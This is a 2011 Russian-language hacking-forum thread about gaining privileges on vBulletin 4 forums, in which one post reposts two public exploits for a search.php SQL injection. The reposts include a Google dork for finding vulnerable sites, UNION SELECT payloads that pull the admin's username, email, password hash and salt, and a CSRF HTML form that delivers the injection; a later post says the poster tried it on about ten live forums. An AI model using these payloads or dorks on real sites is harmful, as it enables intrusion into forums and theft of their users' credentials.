Вернуться   RDot > Аспекты НСД > Web-среда/Web-applications > Форумы

Ответ
 
Опции темы Поиск в этой теме Опции просмотра
Старый 25.01.2011, 16:36   #1
AloneKiller
 
Аватар для AloneKiller
 
Регистрация: 04.10.2010
Сообщений: 79
Репутация: 0
Arrow Кто может что дельного подсказать на 4ую версию воблы?

Сабж, чем реально можно поднять права на 4ой ветке воблы?
AloneKiller вне форума   Ответить с цитированием
Старый 25.01.2011, 20:17   #2
fl00der
 
Регистрация: 06.07.2010
Сообщений: 19
Репутация: 0
По умолчанию

Не пабликом.
__________________
Егор, Егорушка, Егорка.
О! Я, наконец-то, могу иметь собственную подпись! Да еще какую! Я люблю этот форум.
fl00der вне форума   Ответить с цитированием
Старый 26.01.2011, 00:08   #3
AloneKiller
 
Аватар для AloneKiller
 
Регистрация: 04.10.2010
Сообщений: 79
Репутация: 0
По умолчанию

А какие варианты возможны узнать багу? Или я могу дать конкретный адрес для проверки, если ты в теме?
AloneKiller вне форума   Ответить с цитированием
Старый 26.01.2011, 00:34   #4
hard
Banned
 
Регистрация: 06.07.2010
Сообщений: 50
Репутация: 1
По умолчанию

Бери сорцы, покопаешь месяцок, ниче не найдешь и не будет больше тупых вопросов.
hard вне форума   Ответить с цитированием
Старый 26.01.2011, 11:45   #5
AloneKiller
 
Аватар для AloneKiller
 
Регистрация: 04.10.2010
Сообщений: 79
Репутация: 0
По умолчанию

Цитата:
Сообщение от hard Посмотреть сообщение
Бери сорцы, покопаешь месяцок, ниче не найдешь и не будет больше тупых вопросов.
Да ладно тебе, я же просто спросил, может у кого есть какие-то методы. Нет так нет, думал просто что взаимовыручка часто помогает. ;-)
AloneKiller вне форума   Ответить с цитированием
Старый 25.05.2011, 15:21   #6
[Bo0oM]
 
Аватар для [Bo0oM]
 
Регистрация: 16.04.2011
Сообщений: 12
Репутация: 1
По умолчанию

Валидатор
__________________
Noob & slowpoke
[Bo0oM] вне форума   Ответить с цитированием
Старый 25.05.2011, 17:50   #7
SynQ
 
Регистрация: 11.07.2010
Сообщений: 953
Репутация: 352
По умолчанию

Вчера запостили инъекцию в search.php по 4.1.2: http://www.exploit-db.com/exploits/17314/
SynQ вне форума   Ответить с цитированием
Старый 25.05.2011, 22:38   #9
morty10
 
Аватар для morty10
 
Регистрация: 05.07.2010
Сообщений: 77
По умолчанию

SQL Injection

Код:
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
#PhilKer - PinoyHack - RootCON - GreyHat Hackers - Security Analyst#
#[+] Discovered By   : D4rkB1t
#[+] Site            : 1337day.com Inj3ct0r Team
#[+] support e-mail  : d4rkb1t@live.com

Product: http://www.vbulletin.com
Version: 4.0.x
Dork : inurl:"search.php?search_type=1"

--------------------------
#   ~Vulnerable Codes~   #
--------------------------
/vb/search/searchtools.php - line 715;
/packages/vbforum/search/type/socialgroup.php - line 201:203;

--------------------------
#        ~Exploit~       #
--------------------------
POST data on "Search Multiple Content Types" => "groups"

&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#

More info: http://j0hnx3r.org/?p=818

Thank my friends from Inj3ct0r Team (1337day.com)

--------------------------
#        ~Advice~        #
--------------------------
Vendor already released a patch on vb#4.1.3.
UPDATE NOW!

Use HTTP debugger...
Or please watch this video to understand more: http://www.youtube.com/watch?v=fR9RGCqIPkc

---------------------

vBulletin 4.X Security Patch

http://www.vbulletin.com/forum/showthread.php/376995-vBulletin-4.X-Security-Patch?AID=804495&PID=564936

====================================================================
#                                                                  #
#         888     d8          888   _   888          ,d   d8       #
#    e88~\888    d88   888-~\ 888 e~ ~  888-~88e  ,d888 _d88__     #
#   d888  888   d888   888    888d8b    888  888b   888  888       #
#   8888  888  / 888   888    888Y88b   888  8888   888  888       #
#   Y888  888 /__888__ 888    888 Y88b  888  888P   888  888       #
#    "88_/888    888   888    888  Y88b 888-_88"    888  "88_/     #
#                                                                  #
====================================================================


# 1337day.com [2011-05-21]
CSRF/XSRF


Код:
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KedAns-Dz member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

###
# Title : vBulletin 4.0.x (Search) SQLi via Cross-Site Request Scripting
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Web Site : www.1337day.com * www.exploit-id.com * www.09exploit.com
# Twitter page : twitter.com/kedans
# platform : php
# Impact : Remote SQL Injection Via Cross-Site Request Scripting (CSRF/XSRF = SQLi)
# Tested on : [Windows XP sp3 FR] & [Linux.(Ubuntu 10.10) En] & [Mac OS X 10.6.1] & [BSDi-BSD/OS 4.2]
###
# xXx < Greetings to 'indoushka' at the Jail ... and to his mother 'Rebbi Ya3tik eSber' > xXx
###

# (!) Vulnerability Details :

+> Real Provider By : D4rkB1t (d4rkb1t@live.com) | << Thanks For This Great Vulnerability Br0 (^_^) :)
+> References : [http://1337day.com/exploits/16147]
+> Video (By D4rkB1t) : [http://www.youtube.com/watch?v=fR9RGCqIPkc]

>> You'r Can use the exploit via Cross-Site Request Scripting or Request Forgery ,
> The vulnerability About (SQLi) in method 'post' at Page Search.php - So he is can able CSRF/XSRF


# Proof Of Concept (f.eg) :

<form action="http://localhost/search.php?do=process" method="post" name="vbform" id="searchform">
<input type="hidden" name="type[]" value="7" />
<input type="hidden" id="keyword" class="textbox" name="query" tabindex="1" value="[! Group Name !]" />
<input type="hidden" name="searchuser" id="userfield_txt" tabindex="1" value="" />
<input type="hidden" name="exactname" value="1" id="cb_exactname" tabindex="1" />
<input type="hidden" class="textbox primary popupctrl" name="tag" id="tag_add_input" tabindex="1" value="" />
<input type="submit" class="button" name="dosearch" value="Search Now" tabindex="1" accesskey="s"/>
<input type="hidden" name="s" value="" />
<input type="hidden" name="securitytoken" value="[ T0ken 4 Security ]" />
<input type="hidden" name="do" value="process" />
<input type="hidden" name="searchthreadid" value="&cat[0]=1) SQLi-Code-Here" />
</form>

POST Data [ HTTP dbg ] =

<!--
type[]=7&query=[Group-Name]&searchuser=&exactname=1&tag=&dosearch=Search+Now
&s=&securitytoken=[Sec-Token]&do=process&searchthreadid=[SQL-Inj3cTi0n-Here]
-->

# (^_^) ! Good Luck ALL ...

#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================  
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > Islampard + Z4k1-X-EnG + Dr.Ride
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) 
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * ZoRLu
# gunslinger_ * Sn!pEr.S!Te * anT!-Tr0J4n * ^Xecuti0N3r 'www.1337day.com/team' ++ .... * Str0ke
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * TreX (hotturks.org)
# JaGo-Dz (sec4ever.com) * CEO (0nto.me) * PaCketStorm Team (www.packetstormsecurity.org)
# www.metasploit.com * UE-Team (www.09exploit.com) * All Security and Exploits Webs ...
# -+-+-+-+-+-+-+-+-+-+-+-+={ Greetings to Friendly Teams : }=+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
# (D) HaCkerS-StreeT-Team (Z) | Inj3ct0r | Exploit-ID | UE-Team | PaCket.Storm.Sec TM | Sec4Ever 
# h4x0re-Sec | Dz-Ghost | INDONESIAN CODER | HotTurks | IndiShell | D.N.A | DZ Team | Milw0rm
# Indian Cyber Army | MetaSploit | BaCk-TraCk | AutoSec.Tools | HighTech.Bridge SA | Team DoS-Dz
#================================================================================================

# 1337day.com [2011-05-23]
__________________
Research for share.
morty10 вне форума   Ответить с цитированием
Старый 26.05.2011, 09:52   #10
zuzzz
 
Регистрация: 24.02.2011
Сообщений: 75
Репутация: 7
По умолчанию

Вчера хотел опробывать эту уязвимость. Перебрал с десяток форумов, но ни где не получилось. Толи руки кривые, толи еще чего...
Вопрос. Если на форуме нет групп, эту уязвимость можно использовать?
zuzzz вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot